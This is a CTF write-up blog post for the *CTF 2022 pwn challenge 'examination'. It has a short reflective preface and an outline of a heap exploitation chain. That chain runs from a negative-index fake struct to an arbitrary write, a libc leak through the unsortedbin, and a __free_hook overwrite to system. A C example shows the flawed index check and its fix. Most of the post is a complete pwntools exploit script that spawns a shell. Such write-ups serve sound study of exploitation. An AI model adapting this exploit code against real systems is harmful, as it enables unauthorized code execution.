[Original]【*ctf2022】examination
2022-4-28 19:00 7478


Challenge link

Preface

What is growth? Growth is the sense of responsibility that keeps surfacing in your mind while you are still immature. I have been learning pwn for more than half a year now; I can hardly keep calling myself a newbie.

From barely being able to handle stack challenges, giving up on nearly every heap challenge, and hiding from anything involving musl, go or arm, to now actively going and learning that material: that is growth. Growth is not only an increase in ability; it also means a maturing of the heart and a change in one's attitude toward learning.

Finally, a line from Itachi that has kept replaying in my head lately:

"You are not weak, you just lack conviction."

Solution

Approach

Through an integer overflow, forge a structure upward from the note region to obtain an arbitrary-address write; use it to modify one chunk's size, free that chunk so it lands in the unsortedbin and leaks libc, then use the arbitrary write again to overwrite free_hook with system, and finally free('/bin/sh') to get a shell.

Some of the bypass details really just come out by poking around in a debugger.
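The root cause this approach leans on is an index check that lets a negative note id through (the exploit below uses ids -15 and -13), so a lookup lands in memory before the note table instead of inside it. The C below is an added, hypothetical reconstruction written for this post to show that bug class beside its fix; it is not the challenge binary's source, and the struct layout, `note_count` and the function names are all assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define MAX_NOTES 16

/* Hypothetical note record, constructed for this example; the challenge's
   real layout is not reproduced here. */
struct note {
    char  *comment;
    size_t size;
};

static struct note table[MAX_NOTES];
static int note_count = 2;   /* assumed: two notes have been added */

/* Vulnerable check: `id` is signed and only the upper bound is tested, so a
   negative id such as -15 passes and the caller indexes below the table. */
bool vuln_index_ok(int id)
{
    return id < note_count;
}

/* Hardened check: reject negatives explicitly. Comparing as unsigned gives the
   same result, because a negative id wraps to a huge value that fails the
   upper bound. */
bool safe_index_ok(int id)
{
    return id >= 0 && id < note_count;
}

/* Byte offset from the table base that a given id would address; negative ids
   land in whatever the allocator placed in front of the table. */
ptrdiff_t index_offset(int id)
{
    return (ptrdiff_t)id * (ptrdiff_t)sizeof(struct note);
}

/* Counts how many ids in a sample a given check accepts; the same loop is a
   quick regression test that a patched build rejects every negative id. */
int count_accepted(bool (*check)(int), const int *ids, int n)
{
    int accepted = 0;
    for (int i = 0; i < n; i++)
        if (check(ids[i]))
            accepted++;
    return accepted;
}

int main(void)
{
    const int ids[] = { 0, 1, 2, -1, -13, -15 };   /* constructed sample ids */
    const int n = (int)(sizeof ids / sizeof ids[0]);

    for (int i = 0; i < n; i++)
        printf("id %4d: vuln=%s safe=%s offset=%td\n", ids[i],
               vuln_index_ok(ids[i]) ? "accept" : "reject",
               safe_index_ok(ids[i]) ? "accept" : "reject",
               index_offset(ids[i]));

    printf("accepted: vuln=%d safe=%d\n",
           count_accepted(vuln_index_ok, ids, n),
           count_accepted(safe_index_ok, ids, n));
    return 0;
}
```

Run it and the vulnerable check accepts every negative id while the hardened one accepts only 0 and 1; the offset column shows how far in front of the table each bad id reaches, which is exactly the room an attacker has to place a fake structure.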

Difficulties

This challenge made me realise that my reverse engineering is shit.

When the reversing won't go any further, you can step through it in gdb, sketch it on a piece of scratch paper, or annotate it off to the side in a form you find easier to follow, for example:

[screenshot]

exp

from pwn import *
from LibcSearcher import *
from pwnlib.util.iters import mbruteforce
from hashlib import sha256
import base64
import string   ## needed by proof_of_work (string.ascii_letters / string.digits); missing in the original
context.log_level='debug'
##context.terminal = ["tmux", "splitw", "-h"]
context.arch = 'amd64'
context.os = 'linux'
## the script mixes str and bytes freely, so it is written for Python 2 pwntools
def proof_of_work(sh):
    ## the remote gates the connection behind sha256(xxxx) == <digest>;
    ## brute-force the 4-character string whose sha256 matches
    sh.recvuntil(" == ")
    cipher = sh.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x).encode()).hexdigest() ==  cipher, string.ascii_letters + string.digits, length=4, method='fixed')
    sh.sendlineafter("input your ????>", proof)
 
##r = remote("chuj.top", 51904)
##proof_of_work(r)
libc=ELF('./libc-2.31.so')
r=process('./examination')
 
def z():
    gdb.attach(r)
 
def cho(num):
    r.sendafter("choice>> ",str(num))
 
def t_add(num):   ## teacher: add `num` questions (notes)
    cho(1)
    r.sendlineafter('enter the number of questions: ',str(num))
 
def t_view(idx,cont,size): ##first_view
    ## teacher: review note `idx`. If only the comment prompt arrived, send the
    ## content directly; otherwise answer the size prompt first, then the comment.
    cho(3)
    r.sendlineafter("which one? > ",str(idx))
    bool_=r.recvuntil('comment:')
    if bool_ == "enter your comment:":
       r.send(cont) 
    else :
       r.sendline(str(size))
       r.sendafter("enter your comment:",cont)
 
def t_delet(idx):   ## teacher: delete (free) note `idx`
    cho(4)
    r.sendafter("which student id to choose?",str(idx))
 
def t_role(num):   ## switch role: 0 = teacher, 1 = student
    cho(5)
    r.sendlineafter("role: <0.teacher/1.student>: ",str(num))
 
def s_changeid(idx):   ## student: change id (no check for negative ids)
    cho(6)
    r.sendlineafter("input your id: ",str(idx))
 
##pre
r.sendlineafter("role: <0.teacher/1.student>: ",str(0))
t_add(1) #0
t_add(1) #1
t_view(0,hex(0xdeadbeef),0x300)
t_view(1,hex(0xdeadbeef),0x300)
t_role(1)
cho(3)
t_role(0)
cho(2)
 
##leak_heap
t_role(1)
cho(2)
r.recvuntil("Good Job! Here is your reward! ")
heap=int(r.recvuntil('\n',drop=True),base=16)-0x2a0
log.success('heap:'+hex(heap))
r.sendlineafter("add 1 to wherever you want! addr: ",'00'+str(heap+0x200))
 
##make_fake_struct
## a negative student id points in front of the note table; the fake struct
## written there carries a pointer we control, giving an arbitrary write
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x338)
r.sendlineafter("enter your mode!",pd)
 
##change the size field of chunk 0x55555555f330 from 0x311 to 0x621
t_role(0)
t_view(-13,p64(0x621),0x300)
 
##free it so it is thrown into the unsortedbin
t_delet(0)
 
##change struct 2 leak libc
t_role(1)
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(heap+0x340)
r.sendlineafter("enter your mode!",pd)
s_changeid(-13)
cho(2)
r.recvuntil("here is the review:\n")
libcbase=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-0x1ecbe0
log.success('libcbase:'+hex(libcbase))
 
##set_libc_fuc
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
log.success('free_hook:'+hex(free_hook))
log.success('system:'+hex(system))
 
##change_free_hook
s_changeid(-15)
cho(4)
pd=p64(heap+0x968)+p64(0xdeadbeef)+p64(free_hook)
r.sendlineafter("enter your mode!",pd)
t_role(0)
t_view(-13,p64(system),0x300)
 
##get_shell
t_add(1)
t_view(1,'/bin/sh\x00',0x300)
t_delet(1)
r.interactive()
